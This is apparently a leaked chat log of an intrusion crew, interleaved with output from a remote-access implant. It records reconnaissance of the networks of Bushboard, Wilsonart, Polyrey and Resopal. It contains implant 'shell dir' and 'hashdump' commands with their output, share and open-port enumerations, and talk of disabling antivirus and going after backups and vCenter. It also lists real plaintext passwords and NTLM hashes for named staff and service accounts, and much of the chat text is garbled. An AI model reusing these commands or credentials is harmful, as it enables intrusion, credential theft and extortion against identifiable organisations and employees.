14/12/2020 20:03 740,597,760 VCenterD2020-12-14T200031_7C1E.vib
15/12/2020 20:03 716,304,384 VCenterD2020-12-15T200029_B706.vib
16/12/2020 20:03 731,889,664 VCenterD2020-12-16T200028_8B8F.vib
17/12/2020 20:03 786,378,752 VCenterD2020-12-17T200033_E75E.vib
18/12/2020 20:03 719,417,344 VCenterD2020-12-18T200017_4E4C.vib
19/12/2020 20:04 22,938,509,312 VCenterD2020-12-19T200341_5DF3.vbk
20/12/2020 20:03 777,809,920 VCenterD2020-12-20T200031_A2E8.vib
21/12/2020 20:03 726,798,336 VCenterD2020-12-21T200035_AF2A.vib
22/12/2020 20:03 764,702,720 VCenterD2020-12-22T200039_2DFC.vib
23/12/2020 20:03 750,419,968 VCenterD2020-12-23T200036_9458.vib
24/12/2020 20:03 828,559,360 VCenterD2020-12-24T200021_2518.vib
25/12/2020 20:03 777,314,304 VCenterD2020-12-25T200028_4E96.vib
26/12/2020 20:05 24,845,225,984 VCenterD2020-12-26T200359_13B5.vbk
              16 File(s) 77,860,484,534 bytes
               2 Dir(s) 7,410,316,644,352 bytes free
``I need to see the files in these folders
21/10/2020 21:25 <DIR> Backup
26/12/2020 21:22 <DIR> Daily
10/10/2020 21:35 <DIR> Full Backup
26/12/2020 20:05 <DIR> VCenter
``````
 Directory of \BBDC03.bushboard.co.uk\ADMIN$

23/12/2020 14:04 <DIR> .
23/12/2020 14:04 <DIR> .
16/07/2016 13:23 <DIR> ADFS
07/02/2019 15:13 <DIR> appcompat
13/10/2020 15:16 <DIR> application compatibility scripts
28/09/2020 20:12 <DIR> AppPatch
22/12/2020 14:46 <DIR> AppReadiness
03/05/2019 07:17 <DIR> bcastdvr
28/04/2018 05:47 63,488 bfsvc.exe
23/12/2020 09:49 16,588,854 BGInfo.bmp
16/07/2016 13:23 <DIR> Boot
16/07/2016 13:23 <DIR> Branding
23/12/2020 13:45 <DIR> CbsTemp
03/05/2019 07:17 PM <DIR> Cluster
03/05/2019 07:16 <DIR> CSC
16/07/2016 13:23 <DIR> Cursors
13/08/2019 16:16 436,524 dd_vcredistMSI13B4.txt
23/12/2020 14:04 423,110 dd_vcredistMSI2C36.txt
29/10/2020 16:36 582,720 dd_vcredistMSI576D.txt
29/10/2020 16:45 582,726 dd_vcredistMSI5E40.txt
13/08/2019 16:16:13,680 dd_vcredistUI13B4.txt
23/12/2020 14:04 30,450 dd_vcredistUI2C36.txt
29/10/2020 16:36 46,300 dd_vcredistUI576D.txt
29/10/2020 16:45 46,300 dd_vcredistUI5E40.txt
20/11/2016 18:17 <DIR> de-DE
02/08/2019 09:39 <DIR> debug
21/05/2019 04:02:02 232,960 DfsrAdmin.exe
20/06/2019 10:56 1,315 DfsrAdmin.exe.config
16/07/2016 13:23 <DIR> diagnostics
20/11/2016 18:17 <DIR> digitalLocker
16/07/2016 13:23 <DIR> drivers
06/12/2018 16:27 4,056 DtcInstall.log
06/12/2018 17:21 <DIR> en-GB
01/03/2019 13:30 <DIR> en-US
06/08/2020 22:54 4,674,784 explorer.exe
16/07/2016 13:23 <DIR> GameBarPresenceWriter
16/07/2016 13:23 <DIR> Globalization
20/11/2016 18:17 <DIR> Help
03/06/2017 08:52 975,872 HelpPane.exe
16/07/2016 13:18 18,432 hh.exe
01/03/2019 14:19:94,567 iis.log
03/05/2019 07:17 <DIR> IME
28/09/2020 20:12 <DIR> ImmersiveControlPanel
22/12/2020 14:38 <DIR> INF
16/07/2016 13:23 <DIR> InfusedApps
16/07/2016 13:23 <DIR> InputMethod
16/07/2016 13:23 <DIR> L2Schemas
18/07/2019 13:35 <DIR> LiveKernelReports
14/02/2019 17:31 <DIR> Logs
20/11/2016 09:52 1,340 lsasetup.log
29/05/2019 12:24 AM <DIR> LSDeployment
16/07/2016 13:18 43,131 mib.bin
26/12/2020 09:51 <DIR> Microsoft.NET
16/07/2016 13:23 <DIR> Migration
03/05/2019 07:17 <DIR> MiracastView
16/07/2016 13:23 <DIR> ModemLogs
16/07/2016 13:19 243,200 notepad.exe
19/07/2019 10:05 467,492 ntbtlog.txt
13/08/2019 08:54 <DIR> OCR
10/11/2020 15:39:405 ODBC.INI
02/08/2019 16:01 469 ODBCINST.INI
16/07/2016 13:23 <DIR> Offline Web Pages
06/12/2018 16:27 <DIR> Panther
16/07/2016 13:23 <DIR> Performance
09/12/2020 09:07 2,614,310 PFRO.log
16/07/2016 13:23 <DIR> PLA
28/09/2020 20:12 <DIR> PolicyDefinitions
09/12/2020 09:08 <DIR> prefetch
03/05/2019 07:17 <DIR> PrintDialog
16/07/2016 13:23 <DIR> Provisioning
13/10/2020 15:15 <DIR> rdcbDb
04/03/2017 06:18 320,512 regedit.exe
01/03/2019 14:15 AM <DIR> Registration
13/10/2020 15:15 <DIR> RemotePackages
11/11/2020 09:08 AM <DIR> rescache
16/07/2016 13:23 <DIR> Resources
16/07/2016 13:23 <DIR> SchCache
16/07/2016 13:23 <DIR> schemas
16/07/2016 13:23 <DIR> security
16/07/2016 13:19 28,777 ServerStandard.xml
20/11/2016 09:52 <DIR> serviceProfiles
28/09/2020 20:12 <DIR> servicing
16/07/2016 13:25 <DIR> Setup
22/12/2020 14:38 12,560 setupact.log
20/11/2016 18:53 0 setuperr.log
13/02/2020 14:52 <DIR> ShellExperiences
16/07/2016 13:23 <DIR> SKB
06/12/2018 21:44 <DIR> SoftwareDistribution
16/07/2016 13:23 <DIR> Speech
16/07/2016 13:23 <DIR> Speech_OneCore
08/07/2020 06:58 131,584 splwow64.exe
16/07/2016 13:23 <DIR> System
16/07/2016 13:219 system.ini
22/12/2020 14:38 <DIR> System32
16/07/2016 13:23 <DIR> SystemApps
16/07/2016 13:23 <DIR> SystemResources
23/12/2020 14:03 <DIR> SysWOW64
23/12/2020 10:58 PM <DIR> TAPI
20/11/2016 18:53 <DIR> Tasks
27/12/2020 02:59 <DIR> Temp
16/07/2016 13:23 <DIR> tracing
16/07/2016 13:23 <DIR> twain_32
16/07/2016 13:20 66,560 twain_32.dll
06/12/2018 17:12 <DIR> Veeam
16/07/2016 13:23 <DIR> Vss
13/10/2020 15:16 <DIR> Web
02/08/2019 14:30 <DIR> WID
16/07/2016 13:21 92 win.ini
27/12/2020 00:20 275 WindowsUpdate.log
16/07/2016 13:19 10:240 winhlp32.exe
23/12/2020 14:04 <DIR> WinSxS
16/07/2016 13:18 316,640 WMSysPr9.prx
16/07/2016 13:18 11,264 write.exe
              36 File(s) 29,085,208 bytes
              77 Dir(s) 1,017,358,946,304 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\Bushboard Backups

26/12/2020 05:13 <DIR> .
26/12/2020 05:13 <DIR> .
21/10/2020 21:25 <DIR> Backup
26/12/2020 21:22 <DIR> Daily
10/10/2020 21:35 <DIR> Full Backup
21/10/2020 11:52 <DIR> Test
21/10/2020 11:43 PM <DIR> Test Backup
26/12/2020 20:05 <DIR> VCenter
               0 File(s) 0 bytes
               8 Dir(s) 7,410,316,644,352 bytes free
````SIDOUFHGS*DYIUHFDIGYSDUH*:GUILk
dNSHostName: BBDC03.bushboard.co.uk
    Share name Type Used as Comment
    -------------------------------------------------------------------------------
    ADMIN$ Disk Remote Admin
    Bushboard Backups Disk
```
Bushboard Backups Disk
 Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\BespokeTables

27/12/2020 01:35 <DIR> .
27/12/2020 01:35 <DIR> .
23/12/2020 00:10 7,077,051,904 BespokeTables_backup_2020_12_23_000101_4310632.bak
24/12/2020 00:10 7,077,051,904 BespokeTables_backup_2020_12_24_000101_1575132.bak
25/12/2020 00:10 7,077,051,904 BespokeTables_backup_2020_12_25_000100_9237608.bak
26/12/2020 00:10 7,077,051,904 BespokeTables_backup_2020_12_26_000101_3225660.bak
27/12/2020 00:10 7,077,051,904 BespokeTables_backup_2020_12_27_000101_3078025.bak
               5 File(s) 35,385,259,520 bytes
               2 Dir(s) 4,194,904,961,024 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\DataAnalysis

27/12/2020 01:35 <DIR> .
27/12/2020 01:35 <DIR> .
23/12/2020 00:10 14,766,592 DataAnalysis_backup_2020_12_23_000101_5246638.bak
24/12/2020 00:10 14,766,592 DataAnalysis_backup_2020_12_24_000101_2199136.bak
25/12/2020 00:10 14,766,592 DataAnalysis_backup_2020_12_25_000100_9861612.bak
26/12/2020 00:10 14,766,592 DataAnalysis_backup_2020_12_26_000101_3849664.bak
27/12/2020 00:10 14,766,592 DataAnalysis_backup_2020_12_27_000101_3546028.bak
               5 File(s) 73,832,960 bytes
               2 Dir(s) 4,194,904,961,024 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\distribution

27/12/2020 01:35 <DIR> .
27/12/2020 01:35 <DIR> .
23/12/2020 00:10 5,399,040 distribution_backup_2020_12_23_000101_5246638.bak
24/12/2020 00:10 5,399,040 distribution_backup_2020_12_24_000101_2199136.bak
25/12/2020 00:10 5,399,040 distribution_backup_2020_12_25_000100_9861612.bak
26/12/2020 00:10 5,399,040 distribution_backup_2020_12_26_000101_4005665.bak
27/12/2020 00:10 5,399,040 distribution_backup_2020_12_27_000101_3702029.bak
               5 File(s) 26,995,200 bytes
               2 Dir(s) 4,194,904,961,024 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\ManufacturingDemo

27/12/2020 01:35 <DIR> .
27/12/2020 01:35 <DIR> .
23/12/2020 00:14 23,387,529,728 ManufacturingDemo_backup_202020_12_23_000101_5870642.bak
24/12/2020 00:14 23,387,529,728 ManufacturingDemo_backup_202020_12_24_000101_2355137.bak
25/12/2020 00:14 23,387,529,728 ManufacturingDemo_backup_202020_12_25_000101_0017613.bak
26/12/2020 00:14 23,387,529,728 ManufacturingDemo_backup_202020_12_26_000101_4161666.bak
27/12/2020 00:14 23,387,529,728 ManufacturingDemo_backup_202020_12_27_000101_3702029.bak
               5 File(s) 116,937,648,640 bytes
               2 Dir(s) 4,194,904,961,024 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\ReportServer$CRM

27/12/2020 01:35 <DIR> .
27/12/2020 01:35 <DIR> .
23/12/2020 00:14 694,302,208 ReportServer$CRM_backup_2020_12_23_000101_7898655.bak
24/12/2020 00:14 697,447,936 ReportServer$CRM_backup_2020_12_24_000101_2355137.bak
25/12/2020 00:14 697,447,936 ReportServer$CRM_backup_2020_12_25_000101_0017613.bak
26/12/2020 00:14 696,399,360 ReportServer$CRM_backup_2020_12_26_000101_4161666.bak
27/12/2020 00:14 694,302,208 ReportServer$CRM_backup_2020_12_27_000101_3858030.bak
               5 File(s) 3,479,899,648 bytes
               2 Dir(s) 4,194,904,961,024 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\ReportServer$CRMTempDB

27/12/2020 01:35 <DIR> .
27/12/2020 01:35 <DIR> .
23/12/2020 00:14 23,332,352 ReportServer$CRMTempDB_backup_2020_12_23_000101_8054656.bak
24/12/2020 00:14 21,235,200 ReportServer$CRMTempDB_backup_2020_12_24_000101_2355137.bak
25/12/2020 00:14 22,283,776 ReportServer$CRMTempDB_backup_2020_12_25_000101_0173614.bak
26/12/2020 00:14 21,235,200 ReportServer$CRMTempDB_backup_2020_12_26_000101_4317667.bak
27/12/2020 00:14 21,235,200 ReportServer$CRMTempDB_backup_2020_12_27_000101_3858030.bak
               5 File(s) 109,321,728 bytes
               2 Dir(s) 4,194,904,961,024 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\SP2010_Admin_Content

27/12/2020 01:35 <DIR> .
27/12/2020 01:35 <DIR> .
23/12/2020 00:14 354,596,352 SP2010_Admin_Content_backup_2020_12_23_000101_9458665.bak
24/12/2020 00:14 354,596,352 SP2010_Admin_Content_backup_2020_12_24_000101_2511138.bak
25/12/2020 00:14 354,596,352 SP2010_Admin_Content_backup_2020_12_25_000101_0485616.bak
26/12/2020 00:14 354,596,352 SP2010_Admin_Content_backup_2020_12_26_000101_4473668.bak
27/12/2020 00:14 354,596,352 SP2010_Admin_Content_backup_2020_12_27_000101_4170032.bak
               5 File(s) 1,772,981,760 bytes
               2 Dir(s) 4,194,904,961,024 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\SP2010_config

27/12/2020 01:35 <DIR> .
27/12/2020 01:35 <DIR> .
23/12/2020 00:14 18,001,408 SP2010_config_backup_202020_12_23_000101_9770667.bak
24/12/2020 00:14 18,001,408 SP2010_config_backup_2020_12_24_000101_2667139.bak
25/12/2020 00:14 18,001,408 SP2010_config_backup_2020_12_25_000101_0641617.bak
26/12/2020 00:14 18,001,408 SP2010_config_backup_2020_12_26_000101_4473668.bak
27/12/2020 00:14 18,001,408 SP2010_config_backup_2020_12_27_000101_4170032.bak
               5 File(s) 90,007,040 bytes
               2 Dir(s) 4,194,904,961,024 bytes free
``the chek in labetam like brodcast on all network canhm, but there requires macadr)https://www.depicus.com/wake-on-lan/wake-on-lan-cmduser7user3двоих not enough us all here ?
7/12/2020 01:35 <DIR> BespokeTables
27/12/2020 01:35 <DIR> DataAnalysis
27/12/2020 01:35 <DIR> distribution
27/12/2020 01:35 <DIR> ManufacturingDemo
27/12/2020 01:35 <DIR> ReportServer$CRM
27/12/2020 01:35 <DIR> ReportServer$CRMTempDB
27/12/2020 01:35 <DIR> SP2010_Admin_Content
27/12/2020 01:35 <DIR> SP2010_config
``````
 Directory of \BBDC03.bushboard.co.uk\SQL_Server\App

09/08/2019 15:38 <DIR> .
09/08/2019 15:38 <DIR> .
27/12/2020 01:35 <DIR> A_Winman
27/12/2020 01:35 PM <DIR> BBHoldings
27/12/2020 01:35 PM <DIR> Bdc_Service_DB_aff7f39f8b654700a677cbcc4c641655
27/12/2020 01:35 PM <DIR> BespokeTables
27/12/2020 01:35 <DIR> DataAnalysis
27/12/2020 01:35 <DIR> distribution
27/12/2020 01:35 <DIR> ManufacturingDemo
27/12/2020 01:35 <DIR> ReportServer$CRM
27/12/2020 01:35 <DIR> ReportServer$CRMTempDB
27/12/2020 01:35 <DIR> SP2010_Admin_Content
27/12/2020 01:35 <DIR> SP2010_config
27/12/2020 01:35 <DIR> WinMan
27/12/2020 01:35 <DIR> WinManMaster
27/12/2020 01:35 <DIR> WSS_Content
27/12/2020 01:35 PM <DIR> WSS_Content_5eddefdaf170489fac09efbaa04bc6ed
27/12/2020 01:35 PM <DIR> WSS_Content_704c79658cf640d5a47ca3fd6e902911
27/12/2020 01:35 PM <DIR> WSS_Logging
27/12/2020 01:35 <DIR> WSS_Search_bbdb01
               0 File(s) 0 bytes
              20 Dir(s) 4,194,904,961,024 bytes free
``Please don't forget servers that will be mapped need to be run with the tasklist section we will pull in the trust after turning off the avs we will go there even dll from depatam simantec breaks everything2003 nothing flies out there or something I don't understand ``some bug or something
WI.RWP.COM
srv: / 60
arm: / 515
``Some files you might find interesting, some listings on backups and fileservers)
beacon> shell dir \\BBDC03.bushboard.co.uk\vCenterBackups
[*] Tasked beacon to run: dir \\BBDC03.bushboard.co.uk\vCenterBackups
[+] host called home, sent: 74 bytes
[+] received output:
 Volume in drive \BBDC03.bushboard.co.uk\vCenterBackups is Backup of VSphere
 Volume Serial Number is 34A9-AA2B

 Directory of \BBDC03.bushboard.co.uk\vCenterBackups

23/10/2020 13:32 <DIR> .
23/10/2020 13:32 <DIR> .
               0 File(s) 0 bytes
               2 Dir(s) 7,410,316,644,352 bytes free

``````
beacon> shell dir \\BBDC03.bushboard.co.uk\SQL_Server
[*] Tasked beacon to run: dir \\BBDC03.bushboard.co.uk\SQL_Server
[+] host called home, sent: 70 bytes
[+] received output:
 Volume in drive \BBDC03.bushboard.co.uk\SQL_Server is New Volume
 Volume Serial Number is 5A0C-69A2

 Directory of \BBDC03.bushboard.co.uk\SQL_Server

22/08/2019 13:16 <DIR> .
22/08/2019 13:16 <DIR> .
09/08/2019 15:38 <DIR> App
09/08/2019 15:57 <DIR> Sys
               0 File(s) 0 bytes
               4 Dir(s) 4,194,904,961,024 bytes free

beacon> shell dir \\BBDC03.bushboard.co.uk\SQL_Server\App
[*] Tasked beacon to run: dir \BBDC03.bushboard.co.uk\SQL_Server\App
[+] host called home, sent: 74 bytes
[+] received output:
 Volume in drive \BBDC03.bushboard.co.uk\SQL_Server is New Volume
 Volume Serial Number is 5A0C-69A2

 Directory of \BBDC03.bushboard.co.uk\SQL_Server\App

09/08/2019 15:38 <DIR> .
09/08/2019 15:38 <DIR> .
27/12/2020 01:35 <DIR> A_Winman
27/12/2020 01:35 PM <DIR> BBHoldings
27/12/2020 01:35 PM <DIR> Bdc_Service_DB_aff7f39f8b654700a677cbcc4c641655
27/12/2020 01:35 PM <DIR> BespokeTables
27/12/2020 01:35 <DIR> DataAnalysis
27/12/2020 01:35 <DIR> distribution
27/12/2020 01:35 <DIR> ManufacturingDemo
27/12/2020 01:35 <DIR> ReportServer$CRM
27/12/2020 01:35 <DIR> ReportServer$CRMTempDB
27/12/2020 01:35 <DIR> SP2010_Admin_Content
27/12/2020 01:35 <DIR> SP2010_config
27/12/2020 01:35 <DIR> WinMan
27/12/2020 01:35 <DIR> WinManMaster
27/12/2020 01:35 <DIR> WSS_Content
27/12/2020 01:35 PM <DIR> WSS_Content_5eddefdaf170489fac09efbaa04bc6ed
27/12/2020 01:35 PM <DIR> WSS_Content_704c79658cf640d5a47ca3fd6e902911
27/12/2020 01:35 PM <DIR> WSS_Logging
27/12/2020 01:35 <DIR> WSS_Search_bbdb01
               0 File(s) 0 bytes
              20 Dir(s) 4,194,904,961,024 bytes free

beacon> shell dir \\BBDC03.bushboard.co.uk\SQL_Server\Sys
[*] Tasked beacon to run: dir \BBDC03.bushboard.co.uk\SQL_Server\Sys
[+] host called home, sent: 74 bytes
[+] received output:
 Volume in drive \BBDC03.bushboard.co.uk\SQL_Server is New Volume
 Volume Serial Number is 5A0C-69A2

 Directory of \BBDC03.bushboard.co.uk\SQL_Server\Sys

09/08/2019 15:57 <DIR> .
09/08/2019 15:57 <DIR> .
27/12/2020 01:30 <DIR> master
27/12/2020 01:30 <DIR> model
27/12/2020 01:30 <DIR> msdb
               0 File(s) 0 bytes
               5 Dir(s) 4,194,904,961,024 bytes free
``Listing of these dirs``
dNSHostName: BBDC03.bushboard.co.uk

    Share name Type Used as Comment
    -------------------------------------------------------------------------------
    ADMIN$ Disk Remote Admin
    Bushboard Backups Disk
    C$ Disk Default share
    E$ Disk Default share
    F$ Disk Default share
    IPC$ IPC Remote IPC
    iTop-2.6.1-4463 Disk
    log Disk
    SQL_Server Disk
    U$ Disk Default share
    UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.  
    VBRCatalog Disk
    vCenterBackups Disk
    WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system.                                           
    WSUSTemp Disk A network share used by Local Publishing from a Remote WSUS Console Instance.                        
 
```

SQL_Server
The printerBackup, which will be pkv inet software[ ](https://mediaeveryone.com/group/wilsonart-com?msg=ChphJoH4mMpmgKttk) raised and scored, only about the batnick then there was talk and how to make it too `` ``
>description: VMware vCenter 6.0 Server
>operatingSystem: Windows Server 2012 R2 Datacenter
>dNSHostName: dcwas79.Wilsonart.com

    login: fowlerh@wilsonart.com
    paswd: R3f1nn3j2!

    Share name Type Used as Comment
    ----------------------------------------
    ADMIN$ Disk Remote Admin
    C$ Disk Default share
    D$ Disk Default share
    IPC$ IPC Remote IPC

    170.7.76.79:5985
    170.7.76.79:3389
    170.7.76.79:636
    170.7.76.79:514
    170.7.76.79:443
    170.7.76.79:389
    170.7.76.79:139
    170.7.76.79:135
    170.7.76.79:88
    170.7.76.79:80
 
>description: Veeam Backup Server
>operatingSystem: Windows Server 2016 Standard
>dNSHostName: dcveeam01.Wilsonart.com

    Share name Type Used as Comment
    ----------------------------------------
    ADMIN$ Disk Remote Admin
    C$ Disk Default share
    F$ Disk Default share
    IPC$ IPC Remote IPC
 
>description: Symantec End Point Management Server
>operatingSystem: Windows Server 2012 Standard
>dNSHostName: DCWAS45.Wilsonart.com

    login: admin
    paswd: pRe1Udlp!

    Share name Type Used as Comment
    ------------------------------------------
    ADMIN$ Disk Remote Admin
    C$ Disk Default share
    IPC$ IPC Remote IPC
    print$ Disk Printer Drivers
 
>description: PROD Symantec AntiVirus Management Server
>operatingSystem: Windows Server 2012 Standard
>dNSHostName: FLWAS03.Wilsonart.com

    net view \FLWAS03.Wilsonart.com /all
    System error 53 has occurred.
    The network path was not found.

    Ping statistics for 170.7.20.198:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

    170.7.20.198:53161
    170.7.20.198:49154
    170.7.20.198:49153
    170.7.20.198:9090
    170.7.20.198:8446
    170.7.20.198:8445
    170.7.20.198:8443
    170.7.20.198:8014
    170.7.20.198:8008
    170.7.20.198:8006
    170.7.20.198:5985
    170.7.20.198:5060
    170.7.20.198:3389
    170.7.20.198:2000
    170.7.20.198:1611
    170.7.20.198:1610
    170.7.20.198:1100
    170.7.20.198:143
    170.7.20.198:139
    170.7.20.198:135
    170.7.20.198:110
    170.7.20.198:80
    170.7.20.198:25
    170.7.20.198:21
 
 
 
 
 
>description: Vcenter Server
>dNSHostName: bod01-vce01.eu.wilsonart.com

    net view \bod01-vce01.eu.wilsonart.com /all
    System error 53 has occurred.
    The network path was not found.

    Ping statistics for 10.40.60.70:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

    10.40.60.70:9443
    10.40.60.70:9087
    10.40.60.70:9084
    10.40.60.70:8084
    10.40.60.70:8008
    10.40.60.70:7444
    10.40.60.70:5580
    10.40.60.70:5480
    10.40.60.70:5060
    10.40.60.70:2020
    10.40.60.70:2015
    10.40.60.70:2014
    10.40.60.70:2012
    10.40.60.70:2000
    10.40.60.70:1514
    10.40.60.70:636
    10.40.60.70:514
    10.40.60.70:443
    10.40.60.70:389
    10.40.60.70:110
    10.40.60.70:88
    10.40.60.70:80
    10.40.60.70:25
    10.40.60.70:21
 
>description: Veeam Backup Server
>operatingSystem: Windows Server 2016 Standard
>dNSHostName: bod01-bkp01.eu.Wilsonart.com

    login: eu.wilsonart.com\svcveeam
    NTLM: 0e7674530ce330128b4425c70fb97f92

    Share name Type Used as Comment
    ----------------------------------------------
    ADMIN$ Disk Remote Admin
    C$ Disk Default share
    D$ Disk Default share
    F$ Disk Default share
    IPC$ IPC Remote IPC
    R$ Disk Default share
    V$ Disk Default share
    veeam_agent_ISOs Disk
    W$ Disk Default share
    X$ Disk Default share

    bod01-bkp01.eu.Wilsonart.com:5989
    bod01-bkp01.eu.Wilsonart.com:5985
    bod01-bkp01.eu.Wilsonart.com:3389
    bod01-bkp01.eu.Wilsonart.com:139
    bod01-bkp01.eu.Wilsonart.com:135
    bod01-bkp01.eu.Wilsonart.com:111
    bod01-bkp01.eu.Wilsonart.com:110
    bod01-bkp01.eu.Wilsonart.com:80
    bod01-bkp01.eu.Wilsonart.com:53
    bod01-bkp01.eu.Wilsonart.com:25 (220 bod01-bkp01.eu.wilsonart.com Microsoft ESMTP MAIL Service, Version: 10.0.14393.0 ready at Sat, 26 Dec 2020 19:58:41 +0100 )
    bod01-bkp01.eu.Wilsonart.com:21 (220 Microsoft FTP Service)
    bod01-bkp01.eu.Wilsonart.com:445 (platform: 500 version: 10.0 name: BOD01-BKP01 domain: EU)
 
 
 
 
 
>dNSHostName: nas_signature.polyrey.net

    Share name Type Used as Comment
    ------------------------------------------------
    Archives_Outlook Disk
    Astier Disk
    CALDERA_RIPS Disk
    Depot Disk
    Design Library Disk
    INFO Disk
    IPC$ IPC IPC Service ()
    PROJETS_Signature Disk
    Signature_PAO Disk
    TEST_JFC Disk
    Users_Archives Disk Users_Archives

    172.25.168.64:6281
    172.25.168.64:5001
    172.25.168.64:5000
    172.25.168.64:548
    172.25.168.64:443
    172.25.168.64:139
    172.25.168.64:80
    172.25.168.64:445 (platform: 500 version: 6.1 name: NAS_SIGNATURE domain: POLYREY)
 
 
 
 
 
 
>description: virtuell auf VMware (Win 10)
>operatingSystem: Windows 10 Pro
>dNSHostName: VIPW7700.resopal.lan

    net view \VIPW7700.resopal.lan /all
    Systemfehler 53 aufgetreten.
    Der Netzwerkpfad wurde nicht gefunden.

    Antwort von 172.22.198.250: Zielhost nicht erreichbar.
    Ping-Statistik für 172.22.190.190:
    Pakete: Gesendet = 4, Empfangen = 4, Verloren = 0
    (0% Verlust),

    172.22.198.250:541
    172.22.198.250:443
    172.22.198.250:22 (SSH-2.0-U_fcWc)
 
 
 
 
>operatingSystem: Windows 7 Professional
>dNSHostName: BBBACKUP.bushboard.co.uk

    Ping request could not find host BBBACKUP.bushboard.co.uk. Please check the name and try again.
 
>description: Backup Server
>operatingSystem: Windows Server 2012 Datacenter
>servicePrincipalName: MSSQLSvc/BBBK01.bushboard.co.uk:VEEAMSQL2012
>dNSHostName: BBBK01.bushboard.co.uk

    Ping statistics for 2002:c001:147::c001:147:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
 
>operatingSystem: Windows Server 2012 Datacenter
>servicePrincipalName: MSSQLSvc/testmove.bushboard.co.uk:VEEAMSQL2012
>dNSHostName: testmove.bushboard.co.uk

    Ping statistics for 2002:c001:15c::c001:15c:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
 
>operatingSystem: Windows Server 2016 Standard
>servicePrincipalName: MSSQLSvc/BBDC03.bushboard.co.uk:VEEAMSQL2012
>servicePrincipalName: MSSQLSvc/BBDC03.bushboard.co.uk:VEEAMSQL2016
>dNSHostName: BBDC03.bushboard.co.uk

    Share name Type Used as Comment
    -------------------------------------------------------------------------------
    ADMIN$ Disk Remote Admin
    Bushboard Backups Disk
    C$ Disk Default share
    E$ Disk Default share
    F$ Disk Default share
    IPC$ IPC Remote IPC
    iTop-2.6.1-4463 Disk
    log Disk
    SQL_Server Disk
    U$ Disk Default share
    UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.  
    VBRCatalog Disk
    vCenterBackups Disk
    WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system.                                           
    WSUSTemp Disk A network share used by Local Publishing from a Remote WSUS Console Instance.                        
 
>operatingSystem: unknown
>dNSHostName: ltn01-vcenter01.bushboard.co.uk

    Ping statistics for 2002:c001:111::c001:111:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
So the rtcompany has raised the question) so we were not told we needed it yet have a backup server listing prepared?
Live Computers:
 
Wilsonart.com
srv: 128 / 141
arm: 676 / 2587
 


uk.Wilsonart.com
srv: 22 / 25
arm: 44 / 157
 
eu.Wilsonart.com
srv: 36 / 43
arm: 2 / 10
 
uk.Wilsonart.com
srv: 1 / 1

WI.RWP.COM
srv: / 60
arm: / 515
 
SLF.LOCAL
srv: 8 / 10
arm: 49 / 66
 
resopal.lan
srv: 26 / 27
arm: 11 / 100

ralpwilson.com
srv: 1 / 1
 
polyrey.net
srv: 53 / 64
arm: 45 / 340
 
BUSHBOARD.CO.UK
srv: 10 / 17
arm: 26 / 136
 
arborite.com
srv: 9 / 12
arm: 29 / 154
``We'll still ave to disconnectHow about a new clean coba? We're doping and ready to go``
bod01-bkp01.eu.Wilsonart.com (via 445)

    login: eu.wilsonart.com\svcveeam
    NTLM: 0e7674530ce330128b4425c70fb97f92
``````
ukwavcsa1.uk.wilsonart.com
admin.ychang
12Pa$w0rd.
``fuck.
here we had two spheres in europe
# we went into them #
one is metrovaya, the other, as we assumed no snapshots
they fly off to the backup server on the vinda's 12Pa$$w0rd
```
admin.ychang
8af4a85a0c80719d98341961187c81fd
``````
eu.Wilsonart.com\Grelles2
Azerty02
``````
eu.Wilsonart.com\blanchp2
Chloe2019
``petsnashli? So what```
>description: Vcenter Server
>dNSHostName: bod01-vce01.eu.wilsonart.com

    net view \bod01-vce01.eu.wilsonart.com /all
    System error 53 has occurred.
    The network path was not found.

    Ping statistics for 10.40.60.70:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

    10.40.60.70:9443
    10.40.60.70:9087
    10.40.60.70:9084
    10.40.60.70:8084
    10.40.60.70:8008
    10.40.60.70:7444
    10.40.60.70:5580
    10.40.60.70:5480
    10.40.60.70:5060
    10.40.60.70:2020
    10.40.60.70:2015
    10.40.60.70:2014
    10.40.60.70:2012
    10.40.60.70:2000
    10.40.60.70:1514
    10.40.60.70:636
    10.40.60.70:514
    10.40.60.70:443
    10.40.60.70:389
    10.40.60.70:110
    10.40.60.70:88
    10.40.60.70:80
    10.40.60.70:25
    10.40.60.70:21
``````
resopal.lan\Metzler CN=Backup Operators
Netz_1020


resopal.lan\Chang CN=Backup Operators
99Lustballons!
``````
polyrey.net\Grellety CN=Admin_VCENTER
Polyrey70


polyrey.net\Blanchard CN=Admin_VCENTER
Louanne50
``````
eu.Wilsonart.com\bod01.svc.vcenter
Jupit3r=
```:space_invader:hello allGood eveningXDa said so)Fuck... You say that))) may be rolled and the other pk from your group
Admin:1001:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865:::
the pc group you are sitting on now I do not understand what group you are talking aboutthis Admin account should roll on this group in fact the pc group look at the car which you sit nowsostav in the local admins? and soot in the pc in this groupa try to check Admin through smb login as local admin here misset (` `)
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:
Admin:1001:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
